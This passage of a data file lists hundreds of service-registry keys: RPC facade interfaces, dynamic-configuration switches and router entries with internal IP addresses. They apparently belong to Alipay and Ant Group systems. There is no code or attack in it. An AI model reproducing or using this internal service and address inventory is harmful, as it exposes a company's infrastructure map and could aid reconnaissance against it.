A","config:com.antfinancial.antchain.baas.endpoint.plus.facade.InfoSecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.discount.common.service.facade.CrowdValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:caprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkcloudfunds.service.facade.depository.api.SupplyChainMerchantTradeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.fusing.GeneralFusingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.85.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoplaycenter.common.divide.facade.api.DividePlayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.finsteward.common.service.facade.service.OrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.findecision:name=com.alipay.findecision.biz.shared.SystemConfig.newProcessServiceSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csivr.common.service.facade.api.CsivrExecutorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.component.manager.ProcessFlowManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.AddFriendReqFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.sysSnapshotAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmcserviceop.creditbizservice.service.facade.CreditBizServiceOperateInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianQueueMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.33.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:pcinstprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echannelcenter.common.service.facade.FreeQueryOweInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.ryb.RYBYieldQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditAuthFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsroalipay.facade.namelist.NameListOpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.StrategySelectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.gray.api.GrayPublishFacade:1.0:auditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.core.invite.manager.InviteTrackManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.CategoryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.miniprod.common.service.facade.api.miniappopinfo.MiniAppOpInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.common.service.facade.v1.service.internal.DoneInternalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.176.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitradeprod.common.facade.mobile.MobileOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.QueryStatsService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.open.facade.PlmDisplayAppOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceSyncExecuteFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.91.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ANTGRAPHFEATUREMETA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.common.FileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.uniintegration.facade.UniIntegrationServiceFacade:1.0:userview_gz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.zoneId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlogmng.common.service.facade.tinyapp.TinyAppFieldService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcbenefitcore.benefit.cert.init@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityprod.common.service.facade.securitymodel.api.SecurityModelManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_tenant_supportTenantManageGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.switch4DistinctUser,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.zcache.tbase.customerTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.degrade.DrmSalDegradeManager.fullSalDegradeJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbretailprod.common.facade.shop.open.ShopInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.InsOpenPartnerConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcommonweal.common.service.facade.api.AcwSubjectBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.DocumentTemplateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyEndToEndFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsTransInProtocolQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialportal.facade.digitalarmy.ExpandJobQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sffcore.MngApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.facade.credit.AgdsadBankQuotaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.trans.api.FundOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.biz.secretary.manager.InteractiveAssistantManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mgw-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.InstAbilityTimelinessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.topic.RealTimeMarketingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.baobei.api.query.BBOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityPackageUpdateFacadeForTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.rptcfg.ReportItemDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.248.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antfin.rayag.facade.service.view.GraphViewModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.securitycap.apayCrmDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.loadbalancer.MountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.LimitCaseQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linku.common.service.facade.department.DepartmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbf.model.service.IBaseService:1.0:trsbrain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:holoxmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.rundata.RunDataWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.profile.api.UserProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.trigger.DeliveryTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.smalltarget.SmallTargetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcomment.common.service.facade.api.reply.ReplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.CcWorkCalendarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.inner.ForeignExchangeInteractiveTaskService:1.0:foreignExchangeInteractiveTaskService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.cptor.facade.manage.CptorGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bkloansceneprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alhub.facade.event.DriveConcernFacade.getDriveConcernTablet:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:auditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.open.api.verify.ICrowdDataVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.common.AssetAttachmentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindvpub.survey.service.SurveyOpenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.task.facade.api.TaskLinkageFacade:1.0:ruleCheckTaskLinkageFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CustomerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.AppTemplateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.EventRecordDetailManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.gateway.AccountGoldGatewayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.bag.facade.BagCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.metadata.api.BizNodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.admin.application.LifeMsgInnerApplicationAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpayplatform.common.service.facade.api.consult.RouterCapacityConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.growth.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.39.245.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.ha.UctfoProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:signFailedOrderHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-ifxquote-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dwdsds.common.service.facade.privilege.service.InnerUserPrivilegeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ALPHAQ#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbasiclib.resource.AdsiDumpProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.invoicecommercial.facade.api.QueryInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.golden.common.facade.charge.ChargeServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agmcenter.common.service.facade.api.AgmFrameProtocolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicAppFacade:1.0:mobilebill_public_app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.rutao.AlscUmpBudgetSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.RuleRunnerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.88.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.voucherprod.facade.api.account.VcpCompanyAccountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.common.service.facade.alloc.spi.AllocActionCallbackService:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatafactory.common.service.facade.datasource.LogicalDataSourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.74.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bksigncentre.common.service.facade.api.OrderQueryFacade:1.0:bksigncentre_orderQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.miniapp.api.AppPermissionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.ignoreDefaultIncomeAccountIsNull,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.atd:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_EC_PLATFORM_COMBINE_SALE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.55.66.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.industry.manage.MerIndusPoolConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.emergency.ability.facade.AssetMartTaskEmergencyAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CapitalSettingMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.feature.FeatureConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.core.service.repository.WithdrawOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.HbProductFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicygw.facade.odps.OfflineServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.ShareholderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.FixedDataSyncDrmImpl.generateCheckScene,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobileufs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.DeliverProjectNoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.148.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:selfoptmngProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.fundtrans.FundtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundPurchaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.240.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zscale.api.IndicatorQueryFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlaw.common.service.facade.api.BlockChainAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.116.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.zoloz.zhub.tangula.facade.RewardPointsSevice:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.calendar.CalendarEventQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.activity.facade.gzone.activity.platform.IotActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.client.ChangeServiceCheckClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_instChannelArInvalidCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.meta.DatasetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.express.manage.Cartoon2ExpressManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetdecision.common.service.facade.api.TxnArrQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.search.TableSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.emc.common.service.facade.api.SystemConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsecurityboss.biz.riskdetector.detectorsApi.RiskDetectWithCodeApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:batchTaskRelievePunishAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.MobileTransferRemindNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.menu.MenuQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instfluxcore.common.service.facade.inst.order.InstDetailCallbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlecore.service.facade.file.InstFileCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.156.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilesearch.common.service.facade.GlobalSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.facade.release.KbaseV1MoveToV2Service:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdiscount.common.service.facade.api.RuleInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.meta.MetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.78.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:finassistantcore_lianjieguanli@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.ActiveReportsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.variable.VariableQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.zcache.tbase.membercenterTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:trsbrain_digitalFinBizRouteService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mydds:name=com.alipay.mydds.core.engine.drm.EnginePublishResource.message,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.UserBizInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.FullSnapshotStoreFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.batch.engine.sdk.service.DagService:1.0:batchEngineDagService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.service.governance.facade.ApiArtifactService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.reportengine.PermissionFacade:1.0:openmonitor_myreports_permission@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.config.managment.OpenManagementFacade:1.0:isupergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.instance.DataProcessInstanceQueryApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.api.CloseInvokeRZService:1.0:finsign_account_cancel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.biz.BizTaskInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finscprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.voucherprod.facade.api.sample.VcpSampleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexchangecore.common.service.facade.api.AdviceAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.cloud.SecurityCloudDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.ItemModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finsign.common.service.facade.account.service.FinsignAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iopencore.common.service.facade.branch.BranchManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:cif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqapi.facade.yqapi.YuqingDataFeedFacade:1.0@DEFAULT#@#DEFAU